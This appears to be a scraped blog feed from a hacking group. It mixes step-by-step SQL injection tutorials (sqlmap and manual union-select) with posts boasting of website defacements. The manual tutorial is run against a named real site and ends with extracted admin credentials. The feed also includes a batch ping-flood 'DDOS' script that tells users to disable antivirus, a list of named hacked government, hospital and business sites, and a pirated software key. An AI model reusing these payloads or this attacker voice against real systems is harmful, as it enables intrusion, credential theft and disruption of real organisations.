0 [#]ADMIN PAGE FINDER TOOL BY MUHAMMAD BILAL PAK CYEBR EXPERTS

[#]ADMIN PAGE FINDER TOOL BY MUHAMMAD BILAL PAK CYEBR EXPERTS[#]

FindHim - Version 2.1 (The Admin Finder) 
Coded By: Subir Sutradhar
OS: Windows/Linux

Download Link : Click Here
GUI Version For Windows : Click Here
For Linux : Click Here




Download Link : Click Here
GUI Version For Windows : Click Here
For Linux : Click Here

Usage Demo Video : www.youtube.com/watch?v=CKAdminFinder

Description:
Helps To Find Out the Admin Login Page Of A Given Website

__Change Log__:
Added Guessing Scheme, To Give Info About Website Source Code Scheme And Directory Paths which can be used with "SET URI <directory>" if needed


Usage:

1. You Need To Set The Target First, Ex: set target www.example.com
2. If You Want The Tool To Search From A Specific Directory, You Have To Set It
   Ex: set uri test (In Most Cases You Would Not Need This)
3. If You Want To Set A Specific Time Out, Set it (Default Set To 5.0)
   Ex: set timeout 1.0 (Lower Than Default Might Result In Connection Timed Out)
   In Most Cases You Will Not Need It
4. You Need To Set A Scheme, like php, asp, cgi,  etc. (Default is Set To html)
   Ex: set scheme php
5. To Check The Options set; show options
6. To Start The Find Him Engine: find
7. Ctrl+C To Abort Finding; To Exit The Tool: quit
8. To Set A Custom Admin Paths: set paths usercustom.txt
   (Check The usercustom.txt in the folder for format)
9. To Get the Help Option: help
10. To Guess the Scheme: guess scheme

Thanks To All Those Who Supported Us.

If You Like Using It, Please Do Share It.
For Any Suggestions, Please Leave A Comment.

Contact: c0d3gray[AT]gmail[DOT]com

EARLIER RELEASES :

Download Link: Click Here


Download Link : Click Here

0 SQL Map Tutorial- BackTrack 5r3 By Muhammad Bilal Pak Cyber Experts

[#]SQL Map Tutorial- BackTrack 5r3 By Muhammad Biall Pak Cyber Experts...!!!


So now lets begin:-

• First find a sql vulnerable site.
• Then open your sqlmap. This would look something like this:
  
  
• To find the databases,type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --dbs

Note:- 

1. -u is used to denote the url
2. --dbs is used to find database of the site

• Then hit Enter Button. This would look something like this
  
  
• Then if the site is vulnerable, this will show the database of the website.
  
  
• To find the current database type  python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --current-db .Then hit Enter.

Note:-

1. --current-db this is used to find current database used by the site.

• After that, to find the tables of a database, type  python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D database_name --tables

Note:-

1. -D is used for taking a specific database.
2. --tables is used for find the tables of a specific database. See the image
   
   

• This will shows all the tables of a database.
  
  
• Then, to find columns of a particular table, type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D database_name -T table_name --columns
  

Note:-

1. -T is used for taking a specific table
2. --columns is used for finding columns

• Now we have come to final steps, till now we have found database, tables, and columns. This time we dump columns.
• To dump columns, type  python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D database_name -T table_name -C column_name --dump

Note:-

1. -C is used for taking a specific column or columns. You can dump one columns or more than one columns by putting comma like this:- -C column_name1, column_name2, column_name3 etc.
2. --dump is used for dumping column or columns at a time. You will understand this by seeing the image
   
   

• Now you have successfully done !!

This is only for educational purpose, we are not responsible for any illegal activity done by you. 

0 Manual SQL injection Tutorial

 [#]SQL INJECTION TUTORIAL BY MUHAMMAD BILAL PAK CYBER EXPERTS[#]


Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.

Download SQLI dorks list from here :

http://www.mediafire.com/?y7v30lcj0kn8836

http://adf.ly/cjpJ <--- password is somewhere in it

PS:I didn't put them in the thread because i passed count limit...

Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.

For example the url of the page you are on may look like thishttp://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add  '

So our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter and you get some kind of error. The errors will vary...

Our page should look like that : (Click to Hide)

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.

Our link should look like that :

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .

Let's try 10.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally that means the number of columns is between 10 and 14.

We try now 11.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...

Let's try 12.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns

Now that we have the number of columns we need to get the column numbers that we can grab information from.

We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number

Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that : (Click to Hide)

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--

These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version

We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .

Why Do We Do That?

If database is under 5 that means we will have to guess the tables names

To do that we need to replace one of the vulnerable columns by "@@verion"

Let's take column 8.

Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :

To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .

Link should be like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that

Now we will search the table we want to access .

We should fine something with admin on it and in our case it's tbladmin

Now we need to get the ASCII value of "tbladmin".

What is ASCII?

http://en.wikipedia.org/wiki/ASCII_value

Now to get the ASCII value of "tbladmin" go to that site :http://getyourwebsitehere.com/jswb/text_to_ascii.html

Spoiler (Click to Hide)

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.

You will get as value that :

Code:

tbladmin

Now remove the characters as & # ; and we add a comma "," between each number .

It should be like that:

Code:

116,98,108,97,100,109,105,110

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--

in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--

Our URL should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:

Now we search for the columns named "username" and "password" or something like that .

In our case it is "username" and "password".

Now we can delete most of the URL .

Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)

0x3a is the ASCII value of a : so we can separate the username from the password.

Our URL should look like t

hat: 
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :

And you're done the username is ishir and password ishir123

Some times password is encrypted with Hashes .

Use my HASH detector to know what it is and decrypt online.

http://www.mediafire.com/?7qd7t6r3b13ccq4

http://adf.ly/cjpJ<---- the password is in it somewhere :)

And We're Done !

I hope you liked my tutorial .

2 Download Mixxx - Free Mp3 DJ Mixing Software

Incredible Features, Unbeatable Value
 Mixxx has everything you need to start making DJ mixes in a tight, integrated package. Whether you're DJing your next house party, spinning at a club, or broadcasting as a radio DJ, Mixxx has what you need to do it right.
Download link : http://www.mixxx.org/ 

0 Download PageBreeze Professional HTML Editor

Download PageBreeze Professional HTML Editor  :
Download link : http://www.solutionsoft.com/pgbreeze.exe
- No serial key or registration key required. 

2 www.sreegokulamayurvedichos.in Indian Hospital Site Hacked By Muhammad Bilal Pak Cyber Experts

[#]www.sreegokulamayurvedichos.in Indian Hospital Site Hacked By Muhammad Bilal Pak Cyber Experts..!!

~http://www.sreegokulamayurvedichospital.in/morenews.aspx
~http://hack-db.com/463011.html

2 Watch Zumi Zumi Vodafone Zoozoos IPL 2013 - Zoozoo Celebrations

Watch Zumi Zumi Vodafone Zoozoos IPL 2013 - Zoozoo Celebrations :
Zumi Zumi we're Zumi Zumi :

0 Bidvertiser Review

Make money from clicks and conversions You get paid for every visitor that clicks on an ad, and an extra revenue if the click turns into conversion. Bidvertiser goal is to enable you to make as much as possible from your advertising space, by letting advertisers bid on your ad space. Bidvertiser pay monthly, either by check, wire or instantly through PayPal with a minimum of only $10 Always have the highest bidders displayed on your website BidVertiser will always display the highest bidders on your site, assuring the maximum revenue possible at any given time. Have your bidding steadily improved over time You will see a constant improvement in your bidding over time, as both your visitors and our advertisers will be exposed to the opportunity of bidding against each other on your ad space. Customize the layout of your ads BidVertiser gives you a simple point-and-click tool to help you customize the layout of the ads to fit your site's look and feel, in order to retain the high quality of your website. Generate detailed reports to monitor your ads performance Use the Publisher Center to generate detailed online reports to monitor your ads performance, including the number of page impressions, clicks, click-through rate, and the total amount you've earned.

0 CBSE 12th Results 2013

CBSE 12th Results 2013 :
CBSE 12th results 2013 has been announced on 27/05/2013.
You can check your result here :
http://results.nic.in
http://cbseresults.nic.in
http://cbse.nic.in

[tags : Central board of secondary education 12th results 2013, CBSE 12th results 2013, CBSE  results] 

1 Download special OnlineMahatma toolbar

We launched special toolbar for OnlineMahatma. Install this toolbar on your browser.
Download link : http://search.bpath.com/toolbar/install/install.dbm?codeID=524085_1333914

3 How to create DDOS using notepad ?

Hello everyone today I am going to share tutorials about "DDOS" using notepad.
Just copy and paste the following code on notepad and save as .bat format. ex : DDOS.bat

@echo off mode 100,50 title DDOS BY D33P4K color 0a cls echo. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ echo CREATED BY D33P4K - TEAM : PAK CYBER EXPERT - SPONSER : WWW.ONLINEMAHATMA.IN echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ echo. set /p x=Server-Target: echo. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ping %x% echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ @ping.exe 127.0.0.1 -n 5 -w 1000 > nul goto Next :Next echo. echo. echo. set /p m=ip Host: echo. set /p n=Packet Size: echo. :DDOS color 0c echo Attacking Server %m% ping %m% -i %n% -t >nul goto DDOS

Coding Explanation :
Change 'mode' value to adjust screen size.
Change 'title' to set your DDOS title.
 Replace "CREATED BY D33P4K - TEAM : PAK CYBER EXPERT - SPONSER : WWW.ONLINEMAHATMA.IN" to your own group name or text.

How to attack using this DDOS :

 
* Please turn off your antivirus when you're using this DDOS.

0 Killer tutorials ever by A'Mohit Gupta

Killer tutorials ever by A'Mohit Gupta.
YouTube link : http://www.youtube.com/watch?v=qtLPBvAsrAE&desktop_uri=%2Fwatch%3Fv%3DqtLPBvAsrAE

0 CD key for Visual Basic 6

Hello,
Today I am going to share working CD key / Serial key for Visual Basic 6.

815-2325261
or
111-1111111

0 www.Sindhpower.gov.pk Hacked By Muhammad Bilal Pak Cyber Experts Op#Loadshedding

[#]www.Sindhpower.gov.pk Hacked By Muhammad Bilal Pak Cyber Experts Op#Loadshedding..!!

~Alhamdulillah :D Sindhpower.gov.pk
~http://hack-db.com/444832.html[#]~ root@Gov: You GoT Pawned By Pak Cyber Experts !




[#]~ You Call This Security ? xD
[#]~ Congratulations Admin You Are HacKeD :P It has been 65 years since independence and we have not resolved this load-shading
issue in Pakistan.
This nation has bared a lot and our patience is over now.
The students can not study, businesses are impacted, people are getting jobless.
+ every year rates are being increased. + every year load shading is being increased.
Nothing harmed to website.
No Database deleted..

[#]~ System Pawned | LuLz !

[#]~ Contact: facebook.com/live22life

0 Advertise with OnlineMahatma !

Hi All,
A warm Welcome and Greetings from OnlineMahatma Team, We hope you are enjoying our services and you stay here. In the chain of our services, the latest addition is for all advertiser who own a good website/blog or services. We have just launched an advertisement campaign on OnlineMahatma, in which you can advertise your site in just 50$ per month and that too on all pages of OnlineMahatma, what more can you get in 50$ ??

There is no Terms and Conditions Of Our Advertisement Program.All types of site has been allowed.

Special holiday offer : Subscribe our advertisement campaign for 2 month and get branded 'Tablet Computer' Free !

More information contact us on : cloudhosttk@yahoo.in / wwwdotnetsodadottk@gmail.com
or simply leave a comment here with your e-mail id.

6 http://dgpr.gop.pk/ Hacked By Muhammad Bilal Pak Cyber Experts

[#]http://dgpr.gop.pk/ Hacked By Muhammad Bilal Pak Cyber Experts op#Load Shedding..!!
~http://dgpr.gop.pk/
~http://www.aljyyosh.org/mirror.php?id=62344

HackeD By Pak Cyber Experts

======================================================================

[#]~ root@Gov: You GoT Pawned By Pak Cyber Experts !


[#]~ You Call This Security ? xD
[#]~ Congratulations Admin You Are HacKeD :P It has been 65 years since independence and we have not resolved this load-shading
issue in Pakistan.
This nation has bared a lot and our patience is over now.
The students can not study, businesses are impacted, people are getting jobless.
+ every year rates are being increased. + every year load shading is being increased.
Nothing harmed to website.
No Database deleted..
[#]~ System Pawned | LuLz ! 
[#]~ Contact: facebook.com/live22life

====================================================================== 

2 Sites Hacked By iluminador Pak Cyber Experts

[#]Sites Hacked By iluminador Pak Cyber Experts..

http://design-heating-consult.com/
http://www.medlers.org/index.html
http://formachs.fr/index.php/incendie.html
http://myfreeclassifiedads.info/index.html
http://taxfreestores.net/
http://myfreeclassifiedads.net/
http://myfreeclassifiedads.com/index.html
http://myfreeclassifiedads.org/index.html
http://myfreeclassifiedadsonline.com/index.html
http://cyacomputo.com/index.html
http://bulpepsoc.info/index.php/welcome-screen
http://www.mrmegalaundry.com/
http://www.glanzdoktor.de/
http://www.fatcatzpoker.com/
http://jiffyhitchsystems.com/
http://chaserader.com/index.html
http://beaversgetbusy.com/
http://interamericanacrf.org/
http://topnewshop.com/
http://tneshop.com/
http://www.gpsformadores.com/
http://foco.org.mx/
http://simsa-gto.org/index.html
http://thai-elt.com/index.php
http://market-pak.ru/

Mirror's On Hack-db.com
http://hack-db.com/team/pak cyber experts/all.html¡...Hacked by iluminador...! 
iluminador Arrived
We Are Pakistani's You Know Who Are Pakistani's?
We Are That Nation Who Is Not Afraid Of Bombs Who Is Not Afraid Of Death Who Is Not Afraid Of Drone Attacks

We Are That Nation

Who Defeated India Many Times In Wars
We Are That Nation Who Faced The Most Dangerous Earth Quack 2005 ...!!
We Are That Nation Who Faced Dangerous Water Flood In 2010, We Are That Nation To Whom Every Body Calls Terrorists, We Are That Nation Who Lost Their Sisters Mothers | Brothers In Many Bomb Blasts

We Are That Nation Which Have No Electricity, We Are That Nation Who Have No Food For 2 Times, Want To Know More About Us Go And Ask From Your Elders Who Are Pakistani's ? Inspite Of These Difficulties We Are Not Less Than Anyone, We Are Telanted Nation, With Less Electricity We Are Defacing You Bitches :D We Made Atom Bomb, We Got Many Oskar Awards, We Are The Most Brave Nation, We Have Strong Army America Want Our Army For Their Defence, Becuase They Have Timid And Coward Army Bitches lol Ok Lets Come To The Main Point, You Just Got Hacked Patch Your Asses, Don't Know How To Secure Shitts And Making Sites lol, Huh ! Now Next Time Keep Eye On Your cPanel | Domain | Your Admin Panel Becuase We Can In Again, Take Care...